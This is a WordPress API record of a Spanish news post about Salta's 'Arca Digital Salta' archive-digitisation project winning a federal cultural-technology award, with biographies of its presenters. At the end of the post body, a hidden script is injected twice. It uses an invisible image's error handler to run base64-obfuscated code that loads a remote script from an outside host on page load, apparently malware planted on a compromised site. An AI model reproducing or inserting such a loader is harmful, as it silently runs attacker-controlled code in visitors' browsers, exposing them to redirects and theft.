{"id":1609,"date":"2022-10-14T11:11:28","date_gmt":"2022-10-14T14:11:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1609"},"modified":"2025-08-14T00:33:12","modified_gmt":"2025-08-14T03:33:12","slug":"salta-fue-galardonada-en-el-programa-de-industrias-culturales-y-nuevas-tecnologias","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1609","title":{"rendered":"Salta fue galardonada en el Programa de Industrias Culturales y Nuevas Tecnolog\u00edas"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#a4092f\"><em>El proyecto Arca Digital Salta fue galardonado en el Programa organizado por el Consejo Federal de Inversiones.<\/em><\/h3>\n\n\n\n<p>Salta estuvo presente en la segunda Jornada de Integraci\u00f3n Federal, instancia que di\u00f3 cierre al Programa en Industrias Culturales y Nuevas Tecnolog\u00edas organizado por el Consejo Federal de Inversiones donde se galardon\u00f3 al proyecto salte\u00f1o \u201dArca Digital Salta\u201d presentado por&nbsp;<strong>Noelia Carrizo D\u00b4Alessandro<\/strong>&nbsp;de la Direcci\u00f3n de Audiovisuales y&nbsp;<strong>Hern\u00e1n Gim\u00e9nez Lascano&nbsp;<\/strong>de la Subsecretar\u00eda de Gesti\u00f3n Cultural.<\/p>\n\n\n\n<p>El Programa organizado por el CFI se desarroll\u00f3 durante 4 meses atravesando a las Industrias Culturales de la M\u00fasica, Audiovisual, Videojuegos, Editorial, Artesan\u00edas y Patrimonio. Incluyendo 60 horas de encuentros virtuales donde se trataron temas vinculados al Blockchain, NFTS, Web 3.0, Inteligencia Artificial, Realidades Extendidas, Plataformas de Streaming Musical y Audiovisual, Audiolibros, Podcast, Medici\u00f3n de Datos, Startups y formaci\u00f3n de audiencias.<\/p>\n\n\n\n<p>Participaron 28 proyectos de las 23 provincias y CABA. Donde se galardonaron en la noche de cierre en ArtLab a los 3 mejores proyectos del Programa. Arca Digital de Salta, Mate Rock de Misiones y Mapeo Cultural de Neuqu\u00e9n. &nbsp;<\/p>\n\n\n\n<p>La finalidad del Programa tiende a brindar herramientas para la incorporaci\u00f3n de nuevas tecnolog\u00edas en proyectos desarrollados dentro del \u00e1mbito de las industrias culturales y creativas, brindando a los asistentes nuevos conocimientos para abrir nuevos mercados en relaci\u00f3n a sus \u00e1reas de trabajo y las econom\u00edas del conocimiento..<br>&nbsp;<br>Otro objetivo propuesto por el CFI es generar v\u00ednculos que permitan construir una Red Federal de gestores culturales del sector p\u00fablico que intercambien conocimientos y herramientas de nuevas tecnolog\u00edas. Para ello se realizaron dos encuentros de integraci\u00f3n federal en la Ciudad Aut\u00f3noma de Buenos Aires con intensas jornadas de trabajo, reuniones programadas con empresas del sector vinculadas a la tecnolog\u00eda y a la generaci\u00f3n de conocimiento.<br>&nbsp;<br><strong>Sobre \u201dArca Digital Salta\u201d<\/strong><\/p>\n\n\n\n<p>El proyecto tiene por misi\u00f3n conservar y divulgar el material que resguarda el Archivo Hist\u00f3rico de la Provincia, digitalizando, almacenando y brindando acceso p\u00fablico a trav\u00e9s de una plataforma digital.<\/p>\n\n\n\n<p>Seg\u00fan nos comenta Hern\u00e1n Gim\u00e9nez, hoy es imprescindible y el principal objetivo del proyecto es salvar nuestra memoria hist\u00f3rica y ponerla al alcance de la comunidad.<\/p>\n\n\n\n<p>El Archivo Hist\u00f3rico de Salta es un organismo dependiente de la Secretar\u00eda de Cultura de Salta que se encuentra en calle Belgrano 1002 y resguarda material de los \u00faltimos 5 siglos.<\/p>\n\n\n\n<p>Por su parte Noelia Carrizo aclara que la creaci\u00f3n de la plataforma democratizar\u00e1 el acceso al material, que es fuente primordial para investigadores, docentes, estudiantes, realizadores audiovisuales, etc. esta les permitir\u00e1 navegar y acceder al archivo, poniendo al alcance de manera din\u00e1mica, la pandemia aceler\u00f3 esta necesidad y este proyecto viene a dar soluci\u00f3n a esta demanda.<\/p>\n\n\n\n<p><strong>Paula Bertini,<\/strong>&nbsp;Coordinadora de Bibliotecas y Archivos nos cuenta que la digitalizaci\u00f3n hoy se realiza a demanda de los usuarios con copias en baja calidad, con un objetivo informativo; en alta calidad se realizan a trav\u00e9s de convenios con instituciones. La adquisici\u00f3n de equipamiento propio permitir\u00eda resolver tanto la demanda de acceso a la informaci\u00f3n como la preservaci\u00f3n del material en papel.<\/p>\n\n\n\n<p>\u201dSe trata de un proyecto original, coherente y oportuno. Parte de detectar una problem\u00e1tica social concreta, y se ocupa de proponer una abordaje realista para enfrentarla. Se trata de un proyecto s\u00f3lido, tan potente c\u00f3mo realizable. Es decir, responde al contexto y apunta a una problem\u00e1tica actual y desafiante, y propone un camino virtuoso para abordarla\u201d seg\u00fan cita el Consejo Federal de Inversiones.<\/p>\n\n\n\n<p><strong>Sobre los representantes de Salta<\/strong><\/p>\n\n\n\n<p><strong>Noelia Carrizo D\u00b4Alessandro<\/strong><\/p>\n\n\n\n<p>Es Lic. en Comunicaci\u00f3n Social y T\u00e9cnica en Cine, video y tv. Gracias a una beca otorgada por el Festival de Cine Latinoamericano de Trieste por su documental \u201cBarraca 18, historia de un sobreviviente\u201d, realiz\u00f3 estudios en la Escuela de Cine ACT Multimedia de Cinecitt\u00e1, Roma. Trabaj\u00f3 como asistente del director italiano Franco Brogi Taviani con quien coguion\u00f3 el documental \u201cItaliani all\u2019 opera!, gli italiani in Argentina\u201d, del cual es asistente de direcci\u00f3n.<\/p>\n\n\n\n<p>Reside en su ciudad natal Salta, donde se desempe\u00f1a como productora, guionista, directora y gestora cultural. Trabaja en el \u00e1rea de la Direcci\u00f3n de Audiovisuales de la Secretar\u00eda de Cultura de la Provincia de Salta en programas como Las escuelas van al cine, Salta Film Commission, Espacio INCAA, la muestra Semana de Cine, entre otros. Realiz\u00f3 el Posgrado en Gesti\u00f3n Cultural y Comunicaci\u00f3n en FLACSO y dirigi\u00f3 la miniserie \u201cLa mujer de piedra\u201d para la plataforma cont.ar.<br>&nbsp;<br><strong>Hern\u00e1n Gimenez Lascano<\/strong><\/p>\n\n\n\n<p>Es Productor de Medios Audiovisuales egresado de la Universidad Nacional de C\u00f3rdoba y en Buenos Aires se profesionaliz\u00f3 en Branding y Motion Graphics.<\/p>\n\n\n\n<p>Desarroll\u00f3 branding en empresas del Medio televisivo como Stein Branding, Canal \u00e1, Gourmet.com, Cosmopolitan, Films&amp;Arts, Am\u00e9rica, Fashion Tv, Discovery Channel, entre otros. Brind\u00f3 servicios en Cablevisi\u00f3n, Fibertel y Red Intercable donde obtuvo un Mart\u00edn Fierro y dos premios ATVC.<\/p>\n\n\n\n<p>En 2006 fund\u00f3 Salta Films Set, empresa dedicada a la Film Comission. Y luego HG Films y Motion Salta, productoras de contenido, animaci\u00f3n digital y publicidad.<\/p>\n\n\n\n<p>Trabaj\u00f3 en el Ministerio de Cultura, Turismo y Deportes como responsable del \u00e1rea de Comunicaci\u00f3n y Registro Audiovisual donde inici\u00f3 proyectos de archivo digital, recolecci\u00f3n de datos estad\u00edsticos y desarrollo de plataformas digitales.<\/p>\n\n\n\n<p>Se especializ\u00f3 en Gesti\u00f3n Cultural, Industrias Culturales y Desarrollo de Programas Culturales de Base Comunitaria en la Facultad Latinoamericana de Ciencias Sociales.<\/p>\n\n\n\n<p>Actualmente, integra el equipo de trabajo de la Subsecretar\u00eda de Gesti\u00f3n Cultural de Salta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-fue-galardonada-en-el-programa-de-industrias-culturales-y-nuevas-tecnologias-85473\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El proyecto Arca Digital Salta fue galardonado en el Programa organizado por el Consejo Federal de Inversiones. Salta estuvo presente en la segunda Jornada de Integraci\u00f3n Federal, instancia que di\u00f3 cierre al Programa en Industrias Culturales y Nuevas Tecnolog\u00edas organizado por el Consejo Federal de Inversiones donde se galardon\u00f3 al proyecto salte\u00f1o \u201dArca Digital Salta\u201d [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1610,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1609","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1609"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1609"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1609\/revisions"}],"predecessor-version":[{"id":7318,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1609\/revisions\/7318"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1610"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1609"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1609"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1609"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}